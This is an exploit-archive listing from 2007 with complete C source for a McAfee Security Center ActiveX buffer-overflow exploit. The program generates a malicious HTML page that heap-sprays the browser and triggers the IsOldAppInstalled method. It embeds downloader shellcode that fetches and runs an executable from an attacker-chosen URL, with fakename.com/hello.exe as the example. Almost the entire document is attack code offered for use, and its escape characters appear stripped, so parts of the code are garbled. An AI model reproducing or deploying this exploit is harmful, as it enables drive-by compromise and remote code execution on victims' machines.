[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : McAfee Security Center IsOldAppInstalled ActiveX BoF Exploit
# Published : 2007-05-10
# Author : Jambalaya
# Previous Title : MS Internet Explorer <= 7 Remote Arbitrary File Rewrite PoC (MS07-027)
# Next Title : Sienzo Digital Music Mentor 2.6.0.4 SetEvalExpiryDate SEH Overwrite
/*
McAfee Security Center IsOldAppInstalled ActiveX Buffer Overflow Vulnerability
Peel the frame from axis,Thanks
Test on Windows2000 and dll version Mcsubmgr.dll 6.0.0.15
Greetz to OYXin, sowhat, Winny Thomas and 0x557 team
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
FILE *fp = NULL;
char *file = "McAfee_exploit.html";
char *url = NULL;
//Downloader shellcode
unsigned char sc[] =
"xEBx10x5Bx4Bx33xC9x66xB9x3cx01x80x34x0Bx99xE2xFA"
"xEBx05xE8xEBxFFxFFxFFx70x34x99x99x99xC3x12x6BxAA"
"x59x35xA4x01x99x99x99xECx6Fx18x75x51x99x99x99x12"
"x6Dx10xCFxBDx71x0Cx99x99x99xAAx42x10x9Fx66xAFxF1"
"x17xD7x97x75x71x34x99x99x99x10xDFx91xF1xF5xF5x99"
"x99xF1xF6xF7xB7xFDxF1xECxEBxF5xF4xCDx66xCFx91x10"
"xDFx9Dx66xAFxF1xE7x41x7BxEAx71x11x99x99x99x10xDF"
"x95x66xAFxF1x01x67x13x97x71xE0x99x99x99x10xDFx8D"
"x66xAFxF1xBCx29x66x5Bx71xF3x99x99x99x10xDFx81x66"
"xEFx9DxF1xAFx83xB6xE9x71xC3x99x99x99x10xDFx89xF3"
"xFCxF1xEAxB7xFCxE1x10xFFx85x66xEFx85x66xCFx81xAA"
"x50xC8xC8x66xEFx85x66xEFxBDxC8x66xCFx89xAAx50xC8"
"x66xEFx85x66xCFx8Dx66xCFx95x70x19x99x99x99xCCxCF"
"xFDx38xA9x99x99x99x1Cx59xE1x95x12xD9x95x12xE9x85"
"x34x12xF1x91x72x90x12xD9xADx12x31x21x99x99x99x12"
"x5CxC7xC4x5Bx9Dx99xCAxCCxCFxCEx12xF5xBDx81x12xDC"
"xA5x12xCDx9CxE1x9Ax4Cx12xD3x81x12xC3xB9x9Ax44x7A"
"xABxD0x12xADx12x9Ax6CxAAx66x65xAAx59x35xA3x5DxED"
"x9Ex58x56x94x9Ax61x72x6BxA2xE5xBDx8DxECx78x12xC3"
"xBDx9Ax44xFFx12x95xD2x12xC3x85x9Ax44x12x9Dx12x9A"
"x5Cx72x9BxAAx59x12x4CxC6xC7xC4xC2x5Bx9Dx99x71x50"
"x67x66x66";
unsigned char sc_2[] = "x98";
char * header =
"<!-- McAfee exploit:) Jambalaya-->nn"
"<html>n"
"<object classid="clsid:9BE8D7B2-329C-442A-A4AC-ABA9D7572602" id='target'></object>n"
"<body>n"
"<SCRIPT language="javascript">n"
"tvar heapSprayToAddress = 0x05050505;n"
"tvar shellcode = unescape("%u9090"+"%u9090"+ n";
char * footer =
"n"
"var heapBlockSize = 0x400000;n"
"var payLoadSize = shellcode.length * 2;n"
"var spraySlideSize = heapBlockSize - (payLoadSize+0x38);n"
"var spraySlide = unescape("%u0505%u0505");n"
"spraySlide = getSpraySlide(spraySlide,spraySlideSize);n"
"heapBlocks = (heapSprayToAddress - 0x400000)/heapBlockSize;n"
"memory = new Array();nn"
"for (i=0;i<heapBlocks;i++)n{n"
"ttmemory[i] = spraySlide + shellcode;n}n"
"var padding = String.fromCharCode(0x05);n"
"while( padding.length< 500)n"
"{npadding +=padding;n}n"
"var str = padding.substring(0,500);n"
"var arg2="defaultV";n"
"target.IsOldAppInstalled(str, arg2);n"
"function getSpraySlide(spraySlide, spraySlideSize)n{nt"
"while (spraySlide.length*2<spraySlideSize)nt"
"{nttspraySlide += spraySlide;nt}n"
"tspraySlide = spraySlide.substring(0,spraySlideSize/2);ntreturn spraySlide;n}nn"
"</script>n";
char * trigger_1 =
"</body>n"
"</html>n";
// print unicode shellcode
void PrintPayLoad(char *lpBuff, int buffsize)
{
int i;
for(i=0;i<buffsize;i+=2)
{
if((i%16)==0)
{
if(i!=0)
{
printf(""n"");
fprintf(fp, "%s", "" +n"");
}
else
{
printf(""");
fprintf(fp, "%s", """);
}
}
printf("%%u%0.4x",((unsigned short*)lpBuff)[i/2]);
fprintf(fp, "%%u%0.4x",((unsigned short*)lpBuff)[i/2]);
}
printf("";n");
fprintf(fp, "%s", "");n");
fflush(fp);
}
void main(int argc, char **argv)
{
unsigned char buf[1024] = {0};
int sc_len = 0;
int n;
if (argc < 2)
{
printf("#######################################n");
printf("#tMcAfee Security Center IsOldAppInstalled exploit by Jambalaya:>n");
printf("#ttest on Windows2000 and dll version Mcsubmgr.dll 6.0.0.15:>n");
printf("#tReference : http://lists.grok.org.uk/pipermail/full-disclosure/2007-May/054183.htmln");
printf("#t100%% successful? who knows;)n");
printf("rnUsage: %s <URL> [htmlfile]n", argv[0]);
printf("rnE.g.: %s http://www.fakename.com/hello.exe exploit.htmlrnn", argv[0]);
exit(1);
}
url = argv[1];
if( (!strstr(url, "http://") && !strstr(url, "ftp://")) || strlen(url) < 10)
{
printf("[-] Invalid url. Must start with 'http://','ftp://'n");
return;
}
printf("[+] download url:%sn", url);
if(argc >=3) file = argv[2];
printf("[+] exploit file:%sn", file);
fp = fopen(file, "w");
if(!fp)
{
printf("[-] Open file error!n");
return;
}
//build evil html file
fprintf(fp, "%s", header);
fflush(fp);
memset(buf, 0, sizeof(buf));
sc_len = sizeof(sc)-1;
memcpy(buf, sc, sc_len);
memcpy(buf+sc_len, url, strlen(url));
sc_len += strlen(url);
memcpy(buf+sc_len, sc_2, 1);
sc_len += 1;
PrintPayLoad((char *)buf, sc_len);
fprintf(fp, "%s", footer);
fflush(fp);
fprintf(fp, "%s", trigger_1);
fflush(fp);
printf("[+] exploit write to %s success!n", file);
}
// www.Syue.com [2007-05-10]